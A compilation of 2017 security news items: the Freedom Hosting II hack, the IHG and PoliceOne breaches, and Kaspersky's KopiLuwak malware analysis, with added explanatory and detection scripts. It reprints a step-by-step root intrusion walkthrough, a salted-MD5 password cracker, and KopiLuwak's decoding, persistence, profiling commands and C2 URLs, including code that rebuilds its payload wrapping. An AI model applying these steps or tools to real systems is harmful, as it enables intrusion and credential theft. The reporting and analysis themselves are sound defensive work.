After the closure of the original Freedom Hosting, Freedom Hosting II (FHII) became one of the largest onion web hosting providers, offering free space to any user who signs up for an account.

Anonymous targeted the popular Tor hosting provider because it was providing its services to a large number of websites sharing child pornography images.

The cyber attack was first spotted by Sarah Jamie Lewis, a privacy researcher at mascherari.press, who noticed the mass defacement during a regular scan of the Tor network.

Sarah Jamie Lewis @SarahJamieLewis
Looks like Freedom Hosting II got pwned. They hosted close to 20% of all dark web sites (previous @OnionScan report) https://mascherari.press/onionscan-report-september-2016-uptime-downtime-and-freedom-hosting-ii/
4:10 PM - 3 Feb 2017
(Linked report: "OnionScan Report: September 2016 - Uptime, Downtime and Freedom Hosting II", mascherari.press)
Since OnionScan started in April, Sarah Jamie Lewis and her team had observed FHII hosting between 1,500 and 2,000 services, about 15-20% of the active sites in their scanning lists (figures from the last report, published in October).

Back to the present: 10,613 .onion sites have been taken down as a result of the Freedom Hosting II hack, and all of them were defaced with the image below. The Anonymous message also includes a list of the hacked websites.

[Image: Freedom Hosting II defacement page. Source: Bleepingcomputer.com]

Below is the message published by Anonymous:

“Hello Freedom Hosting II, you have been hacked

We are disappointed… This is an excerpt from your front page ‘We have a zero tolerance policy to child pornography.’ – but what we found while searching through your server is more than 50% child porn…

Moreover you host many scam sites, some of which are evidently run by yourself to cover hosting expenses.

All your files have been copied and your database has been dumped. (74GB of files and 2.3GB of database)

Up to January 31st you were hosting 10613 sites. Private keys are included in the dump. Show full list

We are Anonymous. We do not forgive. We do not forget. You should have expected us.

Thanks for your patience, you don’t have to buy data 😉 we made a torrent of the database dump download here

Here another torrent with all system files (excluding user data) download

You may still donate BTC to 14iCDyeCSp12AmhVfJGxtrzXDabFop4QtU and support us.

If you need to get in contact with us, our mail is fhosting@sigaint.org

We repeatedly get asked how we got into the system. It was surprisingly easy. Here is how we did it: HOW TO HACK FH2“

According to The Verge, Anonymous first offered to sell the compromised data back to Freedom Hosting II for 0.1 bitcoin (roughly $100).
Further analysis revealed that the attackers received at least two payments in their Bitcoin wallet, but they opted to publicly leak the data dump via torrent files.

Watch out: the 2.3 GB dump may contain disturbing images, so do not download the archive unless you need it. Anonymous claims to have downloaded 74GB of files.

Joseph Cox of Motherboard interviewed one of the Anonymous hackers involved in the attack, who explained that this was his first hack ever and that he had not planned to take down all the websites hosted on Freedom Hosting II.

“On Saturday, the hacker claiming responsibility told me in more detail how and why they took down the service.” wrote Cox.

“This is in fact my first hack ever,” they said in an email sent from the same address posted to the hacked Freedom Hosting II sites. “I just had the right idea.”

The hacker, who first compromised the service on January 30, told Vice that they found ten child pornography sites that had uploaded so much content that it accounted for nearly half of the total Freedom Hosting II files.

The security expert Chris Monteiro, who analyzed some of the dumped data, confirmed that the archive includes .onion URLs hosting botnets, fraud sites, fetish websites, hacked data and, of course, child abuse websites.

The archive also contains the private keys of the hosted hidden services. Because a .onion address is derived from the service's key, anyone holding a leaked key can bring up a site at the same address and impersonate it; those addresses should be treated as burned.

[Image: Freedom Hosting II private keys in the dump]


Deku_shrub @Deku_shrub
It's hungry work combing through these leaked databases
8:09 PM - 3 Feb 2017

Deku_shrub @Deku_shrub
Did you know you can access the WWE from the hacked accounts on the darknet? Am disappointed at the lack of John Cena references
10:40 PM - 3 Feb 2017

Deku_shrub @Deku_shrub
Looks like some botnets will have been knocked out in the Freedom Hosting II hack too
7:56 PM - 3 Feb 2017
Below is the step-by-step procedure Anonymous published (the “HOW TO HACK FH2” link in the message above) for the Freedom Hosting II hack. Steps 3 to 7 are the core of it: a per-site SFTP account is enough to symlink the server root into a web directory, and a customer-controlled .htaccess then turns Apache into a file browser for it, exposing the provider's own configuration and database credentials.

1. create a new site or login to an old one
2. login and set sftp password
3. login via sftp and create a symlink to /
4. disable DirectoryIndex in .htaccess
5. enable mod_autoindex in .htaccess
6. disable php engine in .htaccess
7. add text/plain type for .php files in .htaccess
8. have fun browsing files
9. find /home/fhosting
10. look at the content of the index.php file in /home/fhosting/www/
11. find configuration in /home/fhosting/www/_lbs/config.php
12. copy paste database connection details to phpmyadmin login
13. find active users with shell access in /etc/passwd
14. look through the scripts and figure out how password resets work
15. manually trigger a sftp password reset for the user 'user'
16. connect via ssh
17. run 'sudo -i'
18. edit ssh config in /etc/ssh/sshd_config to allow root login
19. run 'passwd' to set root password
20. reconnect via ssh as root
21. enjoy
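The steps above are Anonymous's own account. As an added example, not code from the original article or from Anonymous, the Python script below audits a customer web root for the two conditions steps 3 to 7 depend on: a symlink that resolves outside the document root, and an .htaccess that turns on directory listings, disables DirectoryIndex, switches off the PHP engine or serves .php files as text/plain. The demo layout it builds in a temporary directory is constructed; the directive names are Apache's and mod_php's own.

```python
import os
import re
import tempfile

# .htaccess directives the walkthrough needs (steps 4-7); names are Apache's/mod_php's own.
# A site that legitimately serves PHP has no reason to carry any of them.
RISKY_HTACCESS = {
    "autoindex":   re.compile(r"^\s*Options\b[^\n]*?(?<![-\w])\+?Indexes\b", re.I | re.M),
    "no-dirindex": re.compile(r"^\s*DirectoryIndex\s+disabled\b", re.I | re.M),  # Apache 2.4 form
    "php-off":     re.compile(r"^\s*php_flag\s+engine\s+off\b", re.I | re.M),
    "php-as-text": re.compile(r"^\s*AddType\s+text/plain\b[^\n]*\.php\b", re.I | re.M),
}


def audit_htaccess(text):
    """Return the names of risky directives present in an .htaccess body."""
    return sorted(name for name, rx in RISKY_HTACCESS.items() if rx.search(text))


def escaping_symlinks(docroot):
    """Symlinks under docroot whose target resolves outside it (step 3: a link to '/')."""
    root = os.path.realpath(docroot)
    found = []
    # followlinks=False (the default) so the walk never descends into the linked tree
    for dirpath, dirnames, filenames in os.walk(docroot):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([root, target]) != root:
                found.append((os.path.relpath(path, docroot), target))
    return found


def audit_site(docroot):
    """Combine both checks for one customer's web root."""
    findings = {"symlinks": escaping_symlinks(docroot), "htaccess": {}}
    for dirpath, _, filenames in os.walk(docroot):
        if ".htaccess" in filenames:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = audit_htaccess(fh.read())
            if hits:
                findings["htaccess"][os.path.relpath(path, docroot)] = hits
    return findings


def build_demo_root():
    """Constructed layout: one customer site set up the way the walkthrough describes."""
    site = os.path.join(tempfile.mkdtemp(prefix="fh2-audit-"), "site1", "www")
    os.makedirs(site)
    with open(os.path.join(site, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    os.symlink("/", os.path.join(site, "root"))            # step 3
    with open(os.path.join(site, ".htaccess"), "w") as fh:  # steps 4-7
        fh.write("DirectoryIndex disabled\n"
                 "Options +Indexes\n"
                 "php_flag engine off\n"
                 "AddType text/plain .php\n")
    return site


if __name__ == "__main__":
    print(audit_site(build_demo_root()))
```

On a shared host the fix belongs in the vhost, not in customers' .htaccess files: `AllowOverride None` (or at least withholding the Options and FileInfo override classes), `Options -FollowSymLinks +SymLinksIfOwnerMatch`, and running each customer's PHP under its own user so that another account's config.php cannot be read even when a listing succeeds. SymLinksIfOwnerMatch is checked at request time and has known race-condition weaknesses, which is why the per-user isolation matters more than the directive.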
Stay Tuned.



12 InterContinental Hotels Group properties suffered a massive data breach
5.2.2017 securityaffairs Incident

Hackers compromised payment systems at 12 US properties of the InterContinental Hotels Group and stole card data using malware.
The hospitality giant InterContinental Hotels Group (IHG) has confirmed that payment systems at 12 of its US hotels were hit by a data breach. Just a month ago the company had confirmed an ongoing investigation into an alleged card breach at some of its properties.

IHG informed its customers that payment cards used between August and December 2016 at the restaurants and bars of the 12 US hotels were affected by the breach. The affected properties include the InterContinental San Francisco, the Holiday Inn Resort – Aruba and the InterContinental Chicago Magnificent Mile.


The hackers used malware to infect the payment systems and steal card data, including cardholder name, card number, expiration date and internal verification code.

“IHG hired leading cyber security firms to examine the payment card processing systems for the hotels that it manages in the Americas region. Based on the investigation, IHG is providing notification to guests who used their payment card at restaurants and bars of 12 company managed properties during the time periods from August 2016 – December 2016. An investigation of other properties in the Americas region is ongoing.” reads the official announcement published by the company.

The hospitality giant confirmed that the malicious code used by crooks did not affect payment cards used at the front desk.

“Findings show that malware was installed on servers that processed payment cards used at restaurants and bars of 12 IHG managed properties. Cards used at the front desk of these properties were not affected.” continued the statement from the company.

IHG reported the breach to law enforcement and is working with the payment card networks so that banks can monitor for fraudulent transactions.

At the time of writing there is no information on the number of affected customers.

IHG has set up a dedicated call center to answer guests' questions; additional information about the breach is available at:

www.ihg.com/protectingourguests.


PoliceOne hacked – Hacker is selling thousands of police officials’ accounts
5.2.2017 securityaffairs Hacking

PoliceOne, a forum open only to verified law enforcement officials, has been hacked, and the data dump was offered for sale on a dark web market.
A hacker has stolen over 700,000 user accounts from the popular law enforcement forum PoliceOne and is offering the entire database for sale.

The PoliceOne forum is used by verified police officers and investigators to exchange information on techniques of investigation, training or other law enforcement centric discussions.

“PoliceOne.com is the #1 resource for up-to-the-minute law enforcement information online. More than 500,000 police professionals nationwide are registered PoliceOne members and trust us to provide them with the most timely, accurate and useful information available anywhere.” reads the description of the website.

The news was reported by Motherboard; the data was offered for sale by a hacker who goes by the moniker Berkut.

“We have confirmed the credibility of a purported breach of the PoliceOne forums in 2015 in which hackers were potentially able to obtain usernames, emails and hashed passwords for a portion of our members. While we have not yet verified the claim, we are taking immediate steps to secure user accounts and our forums, which are currently offline while we investigate and gather more information,” a spokesperson for PoliceOne told Motherboard in an email.

“While we store only limited user data and no payment information, we take any breach of data extremely seriously and are working aggressively to resolve the matter. We will be notifying potentially-affected users as a matter of priority and requiring them to change their passwords,” he added.

[Image: PoliceOne data breach]
“Emails from NSA, DHS, FBI and other law enforcement agencies as well as other US government agencies,” Berkut’s listing on the Tochka dark web market reads.

Berkut is selling the full database, which contains around 715,000 user accounts and dates from 2015, for $400 on the Tochka dark web market. The dump contains email addresses belonging to the main US intelligence and security agencies (NSA, DHS, FBI); the hacker also said he had already sold the archive on other forums.

As proof of the hack, Berkut provided Motherboard with several samples of the data, including user details (usernames, email addresses, subscription dates and MD5-hashed passwords). The passwords were stored with salts, random strings mixed into the hash input to make precomputed attacks harder.

A salt defeats rainbow tables, but MD5 is so fast to compute that salted MD5 hashes can still be brute-forced at billions of guesses per second on a single GPU, so every weak password in this dump should be considered cracked.

“The files did indeed contain valid email addresses from the NSA and other US government agencies; one file allegedly contained over 3,000 account details for Homeland Security staffers.” reported the Motherboard.

“To verify that emails in the dump were connected to real accounts on PoliceOne, Motherboard attempted to create new users with a random selection of email addresses. Out of 15 addresses, 14 were already registered on the site.”

How did Berkut hack the PoliceOne website?

PoliceOne was running a vulnerable version of the vBulletin forum software (likely version 4.2.3), so it was easy for the hacker to find a public exploit and breach the site.
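The following is an added example, not part of the original article and not Berkut's tooling, showing why a salted-MD5 dump of the kind described above is still cheap to crack. It assumes the vBulletin 3/4 password scheme md5(md5(password) + salt); the article only says the hashes were salted MD5, so the exact format is an assumption, and the leaked record, salt and wordlist are constructed.

```python
import hashlib
import itertools
import time


def vb_hash(password, salt):
    """Assumed vBulletin 3/4 scheme: md5(md5(password) + salt), hex digests throughout."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()


def crack(target, salt, wordlist, suffixes=("", "1", "123", "!")):
    """Wordlist attack with a few mangling rules against one salted record.

    The salt only stops precomputation: every guess still costs two MD5 calls,
    so the attacker simply hashes candidates with the record's own salt.
    """
    for word, suffix in itertools.product(wordlist, suffixes):
        for candidate in (word + suffix, word.capitalize() + suffix):
            if vb_hash(candidate, salt) == target:
                return candidate
    return None


def guesses_per_second(salt, seconds=0.2):
    """Rough single-core Python rate; a GPU cracker is orders of magnitude faster."""
    n, deadline = 0, time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        vb_hash("benchmark%d" % n, salt)
        n += 1
    return int(n / seconds)


# Constructed leaked record: a member who chose "Police123", stored with a 5-character salt
SAMPLE_SALT = "aB3$x"
SAMPLE_RECORD = vb_hash("Police123", SAMPLE_SALT)
SAMPLE_WORDLIST = ["password", "police", "letmein", "welcome"]

if __name__ == "__main__":
    print("recovered:", crack(SAMPLE_RECORD, SAMPLE_SALT, SAMPLE_WORDLIST))
    print("guesses/s (pure Python):", guesses_per_second(SAMPLE_SALT))
```

Even interpreted Python manages hundreds of thousands of guesses per second here; the defence that actually helps is a deliberately slow hash (bcrypt, scrypt or Argon2) that raises the per-guess cost by several orders of magnitude. The salt is necessary but not sufficient.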


KopiLuwak: A New JavaScript Payload from Turla
4.2.2017 Kaspersky Virus
On 28 January 2017, John Lambert of Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a “very interesting .JS backdoor“. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ICEDCOFFEE payloads, detailed in a private report from June 2016 (available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

Targeting for this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. Popularity of the malware, however, is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits as of January 2017. We assess with high confidence this new JavaScript will be used more heavily in the future as a stage 1 delivery mechanism and victim profiler.

The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.

Actor Profile

Turla, also known as Snake / Uroburos / Venomous Bear and KRYPTON, is a Russian-speaking APT group that has been active since at least 2007. Its activity can be traced to many high-profile incidents, including the 2008 attack against the US Central Command (see the Buckshot Yankee incident) or, more recently, the attack against RUAG, a Swiss military contractor. The Turla group has been known as an agile, very dynamic and innovative APT, leveraging many different families of malware, satellite-based command and control servers and malware for non-Windows OSes.

Targeting Ukraine, EU-related institutions, governments of EU countries, Ministries of Foreign Affairs globally, media companies and possibly corruption related targets in Russia, the group intensified their activity in 2014, which we described in our paper Epic Turla. During 2015 and 2016 the group diversified their activities, switching from the Epic Turla waterhole framework to the Gloog Turla framework, which is still active. They also expanded their spear phishing activities with the Skipper / WhiteAtlas attacks, which leveraged new malware. Recently, the group has intensified their satellite-based C&C registrations ten-fold compared to their 2015 average.

Technical Details

Sample MD5: 6e7991f93c53a58ba63a602b277e07f7
Name: National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc
Author: user
LastModifiedBy: John
CreateDate: 2016:11:16 21:58:00
ModifyDate: 2016:11:24 17:42:00

[Image: the lure document]

The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs (MoFA) in Cyprus. Based on the document name (“National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc”), it is presumed to have been sent from the Qatar Ambassador's secretary to the MoFA, which would indicate that Turla already had control of at least one system within Qatar's diplomatic network.

The document contains a malicious macro very similar to those Turla has used in the past to deliver Wipbot, Skipper and ICEDCOFFEE. The macro does contain a few modifications, mainly a new XOR routine to decode the initial JavaScript and the use of a “marker” string to locate the embedded payload in the document.

New XOR Routine

Below is a snippet of the new XOR routine used to decode the initial JavaScript payload. Turla has consistently changed the values used in this routine over the last year, presumably to avoid easy detection:

' Rolling-key XOR: the key starts at 45 and is re-derived from its previous value and the index each step
Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
Dim THQNfU76nlSbtJ5nX8LY6 As Byte
THQNfU76nlSbtJ5nX8LY6 = 45
For i = 0 To M5wI32R3VF2g5B21EK4d - 1
EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
Next i
Q7JOhn5pIl648L6V43V = True
End Function
Here is a function written in Python to decode the initial payload:

def decode(payload):
    """Reverse the macro's rolling-key XOR; payload is the carved byte string."""
    out = bytearray()
    varbyte = 45                      # initial key, as in the VBA
    for i, byte in enumerate(payload):
        out.append(byte ^ varbyte)
        varbyte = ((varbyte ^ 99) ^ (i % 254)) & 0xFF   # next key depends only on the index
    return bytes(out)
Payload Offset

Another change in the macro is the use of a “marker” string to find the payload offset in the document. Instead of using hard coded offsets at the end of the document as in ICEDCOFFEE, the macro uses the below snippet to identify the start of the payload:

Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
Second Layer JavaScript

Once the marker is found, the macro will carve out “15387 + 1” bytes (hard coded) from the end of the marker and pass that byte array to the aforementioned decoding routine. The end result is a JavaScript file (mailform.js – MD5: 05d07279ed123b3a9170fa2c540d2919) written to “%APPDATA%\Microsoft\Windows\”.

 

[Image: mailform.js, the obfuscated JavaScript payload]

This file is then executed using Wscript.Shell.Run() with a parameter of “NPEfpRZ4aqnh1YuGwQd0”. This parameter is an RC4 key used in the next iteration of decoding detailed below.

The only function of mailform.js is to decode the third layer payload stored in the JavaScript file as a Base64 string. This string is Base64 decoded, then decrypted using RC4 with the key supplied above as a parameter (“NPEfpRZ4aqnh1YuGwQd0”). The end result is yet another JavaScript which is passed to the eval() function and executed.
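The following is an added example, not Kaspersky's code and not the macro's, that replays the stage-1 carve and the stage-2 unwrap described above on a constructed document. The marker string, the hard-coded 15387 + 1 length, the XOR routine and the RC4 key are taken from the text; the way the Base64 literal is located inside mailform.js (the longest Base64-looking run in the file) and the layout of the demo document are assumptions.

```python
import base64
import re

# Values taken from the report: marker string, hard-coded carve length, stage-2 RC4 key
MARKER = b"MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
STAGE1_LEN = 15387 + 1
STAGE2_RC4_KEY = b"NPEfpRZ4aqnh1YuGwQd0"


def macro_keystream(n):
    """Key bytes the VBA routine applies: starts at 45, then k = (k ^ 99) ^ (i % 254)."""
    k, out = 45, bytearray()
    for i in range(n):
        out.append(k)
        k = ((k ^ 99) ^ (i % 254)) & 0xFF
    return bytes(out)


def macro_xor(data):
    """The keystream never depends on the data, so one function both encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, macro_keystream(len(data))))


def carve_stage1(doc):
    """Locate the marker and decode the fixed-length blob that follows it (mailform.js)."""
    pos = doc.find(MARKER)
    if pos < 0:
        raise ValueError("marker not found: not this macro variant")
    start = pos + len(MARKER)
    blob = doc[start:start + STAGE1_LEN]
    if len(blob) < STAGE1_LEN:
        raise ValueError("document truncated before end of payload")
    return macro_xor(blob)


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); stage 2 is decrypted with the key passed on the command line."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def unwrap_stage2(stage1_js, key=STAGE2_RC4_KEY):
    """Pull the Base64 literal out of mailform.js, decode it and RC4-decrypt it to stage 3.

    Assumption: the literal is the longest Base64-looking run in the file.
    """
    runs = re.findall(rb"[A-Za-z0-9+/=]{40,}", stage1_js)
    if not runs:
        raise ValueError("no Base64 blob found")
    return rc4(key, base64.b64decode(max(runs, key=len)))


# Constructed stand-in for the real stage-3 script (the real one profiles the host and beacons)
DEMO_STAGE3 = b"var sh = new ActiveXObject('WScript.Shell'); sh.Run('cmd.exe /c systeminfo', 0, true);"


def build_demo_document(stage3_js):
    """Constructed document that wraps stage3_js the way the report describes; not a real sample."""
    stage2 = base64.b64encode(rc4(STAGE2_RC4_KEY, stage3_js))
    stage1 = b'var p = "' + stage2 + b'"; eval(rc4(p, WScript.Arguments(0)));'
    stage1 = stage1.ljust(STAGE1_LEN, b"\x00")   # pad to the carve length the macro expects
    return b"\xd0\xcf\x11\xe0 ...OLE filler... " + MARKER + macro_xor(stage1) + b" ...trailer..."


if __name__ == "__main__":
    doc = build_demo_document(DEMO_STAGE3)
    stage1 = carve_stage1(doc)
    print(unwrap_stage2(stage1).decode())
```

Because the XOR key schedule depends only on the byte index, the same routine is used to build the demo document and to carve it; on a real sample, `carve_stage1` is the only step that touches the document, and the RC4 key comes from the Run() argument recorded in the persistence value rather than from a constant.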

Third Layer JavaScript

The third layer payload is where the C2 beaconing and system information collection is performed. This JS will begin by copying itself to the appropriate folder location based on the version of Windows running:

c:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\mailform.js

c:\Users\<USERNAME>\AppData\Local\Temp\mailform.js

c:\Documents and Settings\<USERNAME>\Application Data\Microsoft\Windows\mailform.js

Persistence

Next, it will establish persistence on the victim by writing to the following registry key:

Key: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\mailform
Value: wscript.exe /b “<PATH_TO_JS> NPEfpRZ4aqnh1YuGwQd0”

Profiling

After establishing persistence, it executes a series of commands on the victim system via “cmd.exe /c” and stores their output in a file named “~dat.tmp” in the same folder as “mailform.js”:

systeminfo
net view
net view /domain
tasklist /v
gpresult /z
netstat -nao
ipconfig /all
arp -a
net share
net use
net user
net user administrator
net user /domain
net user administrator /domain
set
dir %systemdrive%\Users\*.*
dir %userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*
dir %userprofile%\Desktop\*.*
tasklist /fi "modules eq wow64.dll"
tasklist /fi "modules ne wow64.dll"
dir "%programfiles(x86)%"
dir "%programfiles%"
dir %appdata%
Once the information is collected into the temporary “~dat.tmp” file, the JavaScript reads its contents into memory, RC4 encrypts it with the key “2f532d6baec3d0ec7b1f98aed4774843”, and deletes the file after a 1 second sleep, virtually eliminating storage of victim information on disk and only having an encrypted version in memory.

Network Communications

With the victim info stored in encrypted form in memory, the JavaScript then will perform the necessary callback(s) to the C2 servers which are hard coded in the payload. The addresses seen in this payload were as follows:

http://soligro[.]com/wp-includes/pomo/db.php
http://belcollegium[.]org/wp-admin/includes/class-wp-upload-plugins-list-table.php
It should be noted that the above domains appear to have been compromised by the actor based on the locations of the PHP scripts.

 

[Image: belcollegium[.]org, a legitimate website compromised and used for C2]

Victim data is sent to the C2 servers in the form of a POST request. The headers of the POST request contain a unique User-Agent string that will remain the same per victim system. The User-Agent string is created by performing the following steps:

Concatenate the string “KRMLT0G3PHdYjnEm” + <SYSTEM_NAME> + <USER NAME>

Use the above string as input to the following function (System Name and User Name have been filled in with example data ‘Test’ and ‘Admin’):

function EncodeUserAgent() {
    var out = "";
    // seed + system name + user name; 'Test' and 'Admin' stand in for the real values
    var UserAgent = 'KRMLT0G3PHdYjnEm' + 'Test' + 'Admin';
    for (var i = 0; i < 16; i++) {
        var x = 0;
        // XOR every char code from position i up to (but excluding) the last character
        for (var j = i; j < UserAgent.length - 1; j++) {
            x = x ^ UserAgent.charCodeAt(j);
        }
        x = (x % 10);            // keep one decimal digit per position
        out = out + x.toString(10);
    }
    out = out + 'KRMLT0G3PHdYjnEM';
    return out;
}
The function above will produce a unique “UID” consisting of a 16-digit number with the string “KRMLT0G3PHdYjnEm” appended to the end. In the example above using the System Name “Test” and User Name “Admin”, the end result would be “2356406508689132KRMLT0G3PHdYjnEm”

Prepend the string “Mozilla/5.0 (Windows NT 6.1; Win64; x64); ” to the result from the last step and send it as the User-Agent header (the script builds it as the header pair “user-agent:”, “Mozilla/5.0 …”). This is the unique User-Agent value for the victim's callbacks. In this example, the final header value is “Mozilla/5.0 (Windows NT 6.1; Win64; x64); 2356406508689132KRMLT0G3PHdYjnEm”.

The POST request will contain the unique User-Agent string above as one of the headers and also the Base64 encoded version of the RC4 encrypted victim data collected earlier.
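As an added example that is not part of Kaspersky's report, the Python below ports EncodeUserAgent() and turns it into a detection: given (system name, user name) pairs from an asset inventory it precomputes the UID a KopiLuwak infection on each machine would produce, then scans proxy log lines for the beacon User-Agent and the two C2 paths listed above. The log line format is constructed for the example. The report's prose appends “KRMLT0G3PHdYjnEm” while its code appends “KRMLT0G3PHdYjnEM”, so the matcher accepts either spelling.

```python
import re

# Constant that seeds the UID (from the report); the suffix appended afterwards appears in the
# report both as "...jnEm" and "...jnEM", so the matcher accepts either spelling.
UID_SEED = "KRMLT0G3PHdYjnEm"
BEACON_UA = re.compile(
    r"Mozilla/5\.0 \(Windows NT 6\.1; Win64; x64\); (\d{16})KRMLT0G3PHdYjnE[mM]"
)
# C2 paths observed in this sample; the hosts are compromised WordPress sites, so match on the path
C2_PATHS = (
    "/wp-includes/pomo/db.php",
    "/wp-admin/includes/class-wp-upload-plugins-list-table.php",
)


def kopiluwak_digits(system_name, user_name):
    """Port of EncodeUserAgent(): 16 digits derived from seed + system name + user name.

    Digit i is (XOR of the char codes from index i up to, but excluding, the last
    character) mod 10, exactly as in the script's inner loop (j < length - 1).
    """
    s = UID_SEED + system_name + user_name
    digits = []
    for i in range(16):
        x = 0
        for j in range(i, len(s) - 1):
            x ^= ord(s[j])
        digits.append(str(x % 10))
    return "".join(digits)


def find_beacons(log_lines, known_hosts=()):
    """Flag proxy log lines carrying the KopiLuwak User-Agent.

    known_hosts: iterable of (system_name, user_name) pairs from the asset
    inventory; their expected UIDs are precomputed so a hit can be tied to a
    machine even when the proxy only logs a NAT address.
    Log format is constructed for this example: '<client> <method> <url> "<user-agent>"'.
    """
    expected = {kopiluwak_digits(h, u): (h, u) for h, u in known_hosts}
    line_rx = re.compile(r'(\S+) (\S+) (\S+) "(.*)"$')
    hits = []
    for line in log_lines:
        m = line_rx.match(line)
        if not m:
            continue
        client, method, url, ua = m.groups()
        ua_hit = BEACON_UA.search(ua)
        if not ua_hit:
            continue
        reasons = ["kopiluwak-user-agent"]
        if method == "POST" and any(url.endswith(p) for p in C2_PATHS):
            reasons.append("known-c2-path")
        hits.append({
            "client": client,
            "uid": ua_hit.group(1),
            "attributed_to": expected.get(ua_hit.group(1)),
            "reasons": reasons,
        })
    return hits


# Constructed sample log: one benign request, one beacon matching the report's worked example
# (system "Test", user "Admin"), and one from a machine that is not in the inventory.
SAMPLE_LOG = [
    '10.0.0.5 GET http://www.example.org/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/51.0"',
    '10.0.0.7 POST http://soligro.com/wp-includes/pomo/db.php '
    '"Mozilla/5.0 (Windows NT 6.1; Win64; x64); 2356406508689132KRMLT0G3PHdYjnEm"',
    '10.0.0.9 POST http://belcollegium.org/wp-admin/includes/class-wp-upload-plugins-list-table.php '
    '"Mozilla/5.0 (Windows NT 6.1; Win64; x64); 4242424242424242KRMLT0G3PHdYjnEM"',
]

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG, known_hosts=[("Test", "Admin")]):
        print(hit)
```

The User-Agent match alone is a strong indicator, since the 16 digits plus the fixed suffix do not occur in legitimate traffic; the C2-path check is added as a second reason so a hit on a new, unlisted C2 still surfaces but with lower confidence.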

The C2 will respond in one of four ways after the POST request:

“good”

“exit”

“work”

“fail”

In the case of an answer of “good”, the JavaScript will then sleep for a random amount of time, ranging from 3600-3900 seconds.

The “exit” command causes the script to exit gracefully, shutting down communications with the C2 server until the next startup / login by the user.

The “fail” command is for uninstalling the JavaScript and its persistence. Both the “mailform.js” file and registry key created for persistence will be deleted upon receipt of this command.

The “work” command is used to task the victim’s system to run arbitrary commands via Wscript.shell.run(). It begins by checking to see if a file “mailform.pif” exists in the same directory as the JavaScript, and if so, it will delete it. The victim will then send a POST request to the C2 much in the same way as before with the beacon traffic, but with some slight differences. The User-Agent header will remain the same as in the beacon traffic, but the data sent to the C2 will consist of the 4-byte string “work”. If the response from the server after this acknowledgement is “200 OK”, then the system will proceed to read the response data into memory, RC4 encrypt it using the same key “2f532d6baec3d0ec7b1f98aed4774843”, then write it out to the “mailform.pif” file referenced above. The command file is run, the JavaScript will sleep for 30 seconds, and then the file is subsequently deleted.

Victims and Sinkholing

One of the domains involved in this new malware (soligro[.]com) expired in July 2016 and was available for purchase and sinkholing at the time of the analysis. Sinkhole data shows several potential victims, with one high-profile victim (195.251.32.62) located within the Greek Parliament:

[Image: sinkhole connection data]

The majority of connections to the sinkhole server have been observed from IP ranges residing within Greece. This leads us to believe the main target for the specific document above was Greece, although we also have indications of targeting in Romania and Qatar based on other data.

Conclusions

In recent months, the Turla actors have increased their activity significantly. The addition of KopiLuwak to their already existing ICEDCOFFEE JavaScript payload indicates the group continues to evolve and deliver new tools to avoid detection by known malware signatures.

Currently, the Turla actors seem to continue to rely heavily on embedded macros in Office documents. While this may appear an elementary technique for such a sophisticated actor, they are repeatedly successful in compromising high-value targets with it. Enterprises are advised to disable macros and not allow users to enable such content unless absolutely necessary. Furthermore, the polymorphic obfuscation technique used for the macros has made writing detection signatures difficult.


NATO Publishes Tallinn Manual 2.0 on International Law Applicable to Cyber Ops

4.2.2017 securityweek Cyber

NATO's Cooperative Cyber Defense Centre of Excellence (CCDCOE), based in Tallinn Estonia, has published 'Tallinn Manual 2.0 on the International Law Applicable to Cyber Operations.' Its world launch will be in Washington DC, February 8 at The Atlantic Council; followed by Europe at The Hague, February 13; and Tallinn, February 17.

